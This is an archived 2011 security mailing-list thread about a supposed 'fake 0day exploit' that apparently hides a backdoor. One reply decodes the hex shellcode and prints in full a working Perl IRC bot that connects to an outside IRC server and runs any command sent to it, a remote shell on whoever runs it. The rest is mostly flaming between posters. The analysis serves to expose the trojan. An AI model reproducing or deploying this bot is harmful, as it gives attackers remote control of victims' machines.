[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <CAFMAuHq5YkYYgL4bq21aCjFrOK5eaHnZ6Ls8edQV1A5zrfWRcw@mail.gmail.com>
Date: Fri, 28 Oct 2011 11:48:15 +0200
From: doc mombasa <doc.mombasa@...il.com>
To: GloW - XD <doomxd@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: I know its old,
but what the heck does this do... (exposing a tool...)
jesus you are not fully there are you?
this "exploit" was just another fake exploit to take the piss on people
there has been tons of them
so good work at digging up an 8 year old joke no one gives a shit about
you're ranting even worse than n3td3v
2011/10/26 GloW - XD <doomxd@...il.com>
> Ok... am awake now and, have some infos yes...
> Interesting bot.
> Seems i have spoken with some people regarding this and the release.Here is
> a brief outline of how it goes.
> Attacks were done on some people who run shells on efnet irc network, so in
> order to catch the *morons8 or, ppl who did launch the DoS
> would then be showing up in #darknet channel, and responds to the ops or,
> channel.
> I ran this and saw it still clobbers smb,and still uses the original bug,
> so d0s will still occur,
> however, it will try and join, i believe thats a dead link in there now
> but, would have tried to join a efnet node..
> Speaking with #darknet owners:
>
> > ok dude why was this released...
> msg> we released the original working code. this started a massive war of
> the kids,
> unfortunately many innocent boxes got raped, so we decided to play a small
> game, and make a *version plus*
> or so so say.
> > very interesting concept, new, intuitive to use perl, as many people
> would decrypt it tho, using perl -e , isnt this alittle harsh...
> msg> they run it, it wont affect them, atall, they will see the connection
> and kill it,and since no D0s is launched, it wont really work
> > hrmm well, it is a good idea, to capture the arseholes who wish to ddos
> etc... i see why it is done but also, can i ask you
> do you know what a darknet is ? because, you seem to not see that, ppl
> would assume this channel is all about 'darknets'..
> instead it is only capturing people who will launch a DoS tool,and many
> people seem 'idle'.
> msg> we dont control who comes here, now care, but when it comes to d0s, we
> dont scrw about.hit us,and we will hit back.
> Also, why are you asking me about code wich was made in 2003 or so :P~
> > ahh well, thats purely because, i expose any BS like this code is, but, i
> will not mark this as bullshit.
> it is horseshit :P and, i respect that your at the least, using some
> shitty tool like d0s, instead of faking an exploit.
> I will class this not as exposed atall, instead, it will serve as some
> form of tuition to skids.
> Run the tools you cannot read, and, expect even some shitty perlbot to
> pop out. I like it!
> I will class this as exposed but intuitive, thankyou for your time.
> msg> i dont care what you mark it as, the rule is simple, do not run d0s
> ./appz ! Have a nice day!
> > Again thanks for your time, i will keep the nickname anonymous... your
> not classed as a now-owner , so i guess it is more wtf this was all about,
> even when you wrote the .c or, as i know it,
> was 'brain' or some dude... either way, i tip the black hat to you but
> also warn you not always will them kids be happy to be owned by shitty .c ,
> so, id be expecting more problems from release, than not
> This is your problem, and, i respect your views, just get some knowledge
> into you about wtf a 'darknet' is prompto!
> Also have a nice day.
>
> ..........................................
> Ok so, basically the talk i had with a now non op of channel but,
> interesting coz, it is actually very popular, yet only a few actually
> realise that theyre being linked now to a darknet technology app etc, and
> theyre finding that maybe they should have kept those old ops :P or maybe
> they could just release 'ipv6killer.c' and just fix some
> settings..eitherway, it is kinda unique, and strange why there was no chat
> about this app, until now.. nothing
> solid wich shows this perl, and admittedly, thats a VERY clever bot for
> such a small piece of code.
> Anyhow, thanks to those who found this interesting, sorry to those who
> didnt :)
> I think i might hang in darknet channel and wait for a few "Hi im a lamer!"
> etc... rofl.
> cheers, and cheers to #darknet for atleast not faking the tool completely,
> and, using a skeleton and structure of theyre OWN code.
> Winnuke2000.c is NOT backdoored, and IS theyres also, I think they regret
> releasing it now but, this was 2003, and, as i said, i will try and expose
> anything i find strange, however, from now on, ill be marking exposes under
> noise, as theyre non disclosures.
> xd
>
>
>
>
>
> On 26 October 2011 16:55, Flavio do Carmo Junior <carmo.flavio@...il.com>wrote:
>
>> sounds really useful...
>>
>> [waKKu@...5n ~]$ python -c 'hellcode=(
>> "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63"
>> >
>> "\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69"
>> >
>> "\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72"
>> >
>> "\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e"
>> >
>> "\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65"
>> >
>> "\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f"
>> >
>> "\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49"
>> >
>> "\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e"
>> >
>> "\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22"
>> >
>> "\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63"
>> >
>> "\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d"
>> >
>> "\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43"
>> >
>> "\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68"
>> >
>> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
>> >
>> "\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64"
>> >
>> "\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65"
>> >
>> "\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d"
>> >
>> "\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d"
>> >
>> "\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
>> >
>> "\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c"
>> >
>> "\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
>> >
>> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53"
>> >
>> "\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20"
>> >
>> "\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66"
>> >
>> "\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20"
>> >
>> "\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
>> >
>> "\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f"
>> >
>> "\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63"
>> >
>> "\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68"
>> >
>> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f"
>> >
>> "\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e"
>> >
>> "\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
>> >
>> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28"
>> >
>> "\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
>> >
>> "\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d"
>> >
>> "\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24"
>> >
>> "\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24"
>> >
>> "\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22"
>> >
>> "\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
>> >
>> "\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
>> >
>> "\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d"
>> >
>> "\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64"
>> > "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"); print
>> hellcode;'
>> #!/usr/bin/perl
>> $chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl
>> ";$SIG{TERM}={};exit
>> if fork;use IO::Socket;$sock =
>> IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron
>> +i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
>> /){$mode=$1;last if
>> $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK
>> $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that
>> ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me,
>> type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print
>> $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
>> :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print
>> $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi
>> 2>/dev/null;/tmp/hi
>> [waKKu@...5n ~]$
>>
>> print hellcode[764:];'
>> /tmp/hi
>>
>>
>> --
>>
>> On 26 October 2011 13:49, xD 0x41 <secn3t@...il.com> wrote:
>> > yer ofc... anyhow, ignoring you now...
>> >
>> > you obv think your some leet troll, your not, your ONLY a TROLL :)
>> > have a nice day or is that
>> >
>> > *Goplamamamama Ignananayu*
>> >
>> > forget the jedi oky, you gotta brushup on ya troll trash talk!
>> > bah hahaha.
>> > fool
>> > xd
>> >
>> >
>> > On 26 October 2011 13:44, Antony widmal <antony.widmal@...il.com>
>> wrote:
>> >>
>> >> Using your smartphone while flipping burger can be dangerous pandawan.
>> >> More over if you work at burger king.
>> >>
>> >>
>> >>
>> >> On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 <secn3t@...il.com> wrote:
>> >>>
>> >>> h the idiot who thinks im laurelai... meh , your a fool yourself just
>> for
>> >>> even thinking that much :s
>> >>> your but an echo on the list, wich, does not echo the rest of it, wich
>> is
>> >>> a good place to be.
>> >>> unfortunately, your one of the few who should just be blocked, for
>> making
>> >>> absolutely nothing but abusive crap...
>> >>> your an idiot. not me.
>> >>> i dont run things, why, have you ran it ?
>> >>> Is it good ?
>> >>> hehe... maybe it is!
>> >>> i guess if hes using it...well...
>> >>> *sic*
>> >>>
>> >>>
>> >>>
>> >>> On 26 October 2011 13:21, Antony widmal <antony.widmal@...il.com>
>> wrote:
>> >>>>
>> >>>> Do yourself a favor and run that code dumbass.
>> >>>>
>> >>>> On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 <secn3t@...il.com> wrote:
>> >>>>>
>> >>>>> I use darknets to help me,
>> >>>>> they send me the info i need.
>> >>>>> simple answer to simple question.
>> >>>>> look them up, they may oneday protect you, also.
>> >>>>>
>> >>>>>
>> >>>>> On 26 October 2011 13:15, adam <adam@...sy.net> wrote:
>> >>>>>>
>> >>>>>> http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical
>> code,
>> >>>>>> claims to be a remote kernel root exploit)
>> >>>>>> http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very
>> >>>>>> similar code, claims to be an IIS exploit)
>> >>>>>> http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read
>> entire
>> >>>>>> thread, code is mentioned though)
>> >>>>>> I'm sure there's more, but this kinda reminds me of that leaked
>> >>>>>> "private exploit" on pastebin a few weeks back (you know, the one
>> that was
>> >>>>>> nice enough to create a _local_ root account), and insisted that it
>> was
>> >>>>>> private private private and specifically said NOT to leak it.
>> >>>>>> I am curious as to how you're so certain that it's on "many many
>> >>>>>> boxes" yet know next to nothing about it.
>> >>>>>> On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 <secn3t@...il.com> wrote:
>> >>>>>>>
>> >>>>>>> Hello List,
>> >>>>>>> Id like people to also, like this thread asks, to pls give some
>> >>>>>>> opinion, other than mine.. wich, i am yet to make;
>> >>>>>>>
>> >>>>>>> http://www.hackerthreads.org/Topic-5973
>> >>>>>>>
>> >>>>>>> Please look at this .c code on here, if you wish, and tell me, why
>> >>>>>>> A. It is still in circulation, seeminlgly, on MANY MANY boxes....
>> >>>>>>> B. people still seem to try keep it private :s
>> >>>>>>>
>> >>>>>>> This morning, a friend from webhostingtalk.com ,asked me to take
>> a
>> >>>>>>> look.
>> >>>>>>> I have and, i can only sofar say, once i decrypt the shellcode,
>> ill
>> >>>>>>> know abit more..
>> >>>>>>> altho , i rmember this thing, and, somany people were after it,
>> >>>>>>> people were paying for it, this is first time i have seen it
>> actually
>> >>>>>>> disclosed tho,
>> >>>>>>> admittedly only looked today.
>> >>>>>>> If skiddies are using it to ddos things, I want to makesure i can
>> >>>>>>> expose it, and kill the threats.
>> >>>>>>> thankyou.
>> >>>>>>> xd .// exposing bullshit as i ride!
>> >>>>>>>
>> >>>>>>>
>> >>>>>>> _______________________________________________
>> >>>>>>> Full-Disclosure - We believe in it.
>> >>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>> >>>>>>
>> >>>>>
>> >>>>>
>> >>>>> _______________________________________________
>> >>>>> Full-Disclosure - We believe in it.
>> >>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >>>>> Hosted and sponsored by Secunia - http://secunia.com/
>> >>>>
>> >>>
>> >>
>> >
>> >
>> > _______________________________________________
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>>
>>
>> --
>> --
>> Best regards,
>>
>> Flávio do Carmo Júnior
>> Sydney/NSW
>> http://au.linkedin.com/in/carmoflavio/en
>> http://0xcd80.wordpress.com
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists